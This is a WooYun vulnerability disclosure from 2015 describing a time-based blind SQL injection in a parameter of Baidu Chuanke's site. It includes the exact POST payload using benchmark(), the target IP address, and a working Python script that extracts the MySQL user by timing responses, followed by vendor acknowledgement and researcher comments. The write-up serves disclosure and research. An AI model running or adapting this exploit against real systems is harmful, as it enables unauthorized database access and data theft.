百度传课网一处MySQL注射(附验证脚本)

发表于 2015年07月27日
WooYun漏洞库

漏洞概要

缺陷编号：WooYun-2015-0129572

漏洞标题：百度传课网一处MySQL注射(附验证脚本)

漏洞详情

披露状态：

2015-07-27: 细节已通知厂商并且等待厂商处理中
2015-07-27: 厂商已经确认，细节仅向厂商公开
2015-08-06: 细节向核心白帽子及相关领域专家公开
2015-08-16: 细节向普通白帽子公开
2015-08-26: 细节向实习白帽子公开
2015-09-10: 细节向公众公开

简要描述：

百度传课网一处MySQL注射(附验证脚本)

详细说明：

注入点：

POST /?act=custom&do=loadModule&mod=school HTTP/1.1<br>
Content-Length: 347<br>
Content-Type: application/x-www-form-urlencoded<br>
X-Requested-With: XMLHttpRequest<br>
Referer: http://123.125.112.93<br>
Host: 123.125.112.93<br>
Connection: Keep-alive<br>
Accept-Encoding: gzip,deflate<br>
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4<br>
Accept: */*mid=5&setting%5Bcategory%5D=(benchmark(4000000*(length(user())=17),md5(123)))&setting%5Bcolumn%5D=3&setting%5Bdisplay%5D=true&setting%5Blimit%5D=6&setting%5Bposition%5D=right&setting%5Bsort%5D=2&setting%5Btitle%5D=%E8%AF%BE%E7%A8%8B%E5%88%97%E8%A1%A8&sid=1826279

POST /?act=custom&do=loadModule&mod=school HTTP/1.1

Content-Length: 347

Content-Type: application/x-www-form-urlencoded

X-Requested-With: XMLHttpRequest

Referer: http://123.125.112.93

Host: 123.125.112.93

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4

Accept: */*mid=5&setting%5Bcategory%5D=(benchmark(4000000*(length(user())=17),md5(123)))&setting%5Bcolumn%5D=3&setting%5Bdisplay%5D=true&setting%5Blimit%5D=6&setting%5Bposition%5D=right&setting%5Bsort%5D=2&setting%5Btitle%5D=%E8%AF%BE%E7%A8%8B%E5%88%97%E8%A1%A8&sid=1826279

参数setting[category]和setting[sortlist]可注入。

漏洞证明：

用benchmark保险一些，不会将db server打挂了。猜解user()，得到：

[Done] MySQL user is [email protected]

1	[Done] MySQL user is [email protected]

python脚本：

#encoding=utf-8<br>
import httplib<br>
import time<br>
import string<br>
import sys<br>
import random<br>
import urllibheaders = {'Content-Type': 'application/x-www-form-urlencoded',<br>
           'User-Agent': 'Googlebot/2.1 (+http://www.googlebot.com/bot.html)',}payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'print '[%s] Start to retrive MySQL User:' % time.strftime('%H:%M:%S', time.localtime())<br>
user = ''for i in range(1, 18):<br>
    for payload in payloads:<br>
        s = 'ascii(mid(user()from(%s)for(1)))=%s' % (i, ord(payload))<br>
        s = "mid=5&setting%5Bcategory%5D=(benchmark(4000000*(" + s + "),md5(123)))&setting%5Bcolumn%5D=3&setting%5Bdisplay%5D=true&setting%5Blimit%5D=6&setting%5Bposition%5D=right&setting%5Bsort%5D=2&setting%5Btitle%5D=%E8%AF%BE%E7%A8%8B%E5%88%97%E8%A1%A8&sid=1826279"<br>
        conn = httplib.HTTPConnection('123.125.112.93', timeout=30)<br>
        conn.request(method='POST', url='/?act=custom&do=loadModule&mod=school', body=s, headers=headers)<br>
        start_time = time.time()<br>
        html_doc = conn.getresponse().read()<br>
        conn.close()<br>
        print '.',<br>
        if time.time() - start_time > 1.0:<br>
            user += payload<br>
            print '\n[in progress]', user,<br>
            breakprint '\n[Done] MySQL user is %s' % user

#encoding=utf-8

import httplib

import time

import string

import sys

import random

import urllibheaders = {'Content-Type': 'application/x-www-form-urlencoded',

'User-Agent': 'Googlebot/2.1 (+http://www.googlebot.com/bot.html)',}payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'print '[%s] Start to retrive MySQL User:' % time.strftime('%H:%M:%S', time.localtime())

user = ''for i in range(1, 18):

for payload in payloads:

s = 'ascii(mid(user()from(%s)for(1)))=%s' % (i, ord(payload))

s = "mid=5&setting%5Bcategory%5D=(benchmark(4000000*(" + s + "),md5(123)))&setting%5Bcolumn%5D=3&setting%5Bdisplay%5D=true&setting%5Blimit%5D=6&setting%5Bposition%5D=right&setting%5Bsort%5D=2&setting%5Btitle%5D=%E8%AF%BE%E7%A8%8B%E5%88%97%E8%A1%A8&sid=1826279"

conn = httplib.HTTPConnection('123.125.112.93', timeout=30)

conn.request(method='POST', url='/?act=custom&do=loadModule&mod=school', body=s, headers=headers)

start_time = time.time()

html_doc = conn.getresponse().read()

conn.close()

print '.',

if time.time() - start_time > 1.0:

user += payload

print '\n[in progress]', user,

breakprint '\n[Done] MySQL user is %s' % user

修复方案：

参数过滤

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2015-07-2711:03

厂商回复：

感谢提交

评价

2010-01-01 00:00 子非海绵宝宝白帽子 | Rank:1220 漏洞数:113)

2个...这回小龙虾免费了!2333333
@lijiejie
2010-01-01 00:00 皮卡丘♪～(´ε｀　) 白帽子 | Rank:0 漏洞数:0)

前排失败 = =
2010-01-01 00:00 Wulala 白帽子 | Rank:201 漏洞数:17)

@子非海绵宝宝那么小能满足你吗? 要大的.
2010-01-01 00:00 牛小帅白帽子 | Rank:407 漏洞数:34)

lijiejie
2010-01-01 00:00 PyNerd 白帽子 | Rank:134 漏洞数:17)

吃完百度外卖的小龙虾，就开始搞百度了。。。 @lijiejie
2010-01-01 00:00 lijiejie 白帽子 | Rank:2210 漏洞数:264)

@子非海绵宝宝百度请我吃小龙虾，哈哈 🙂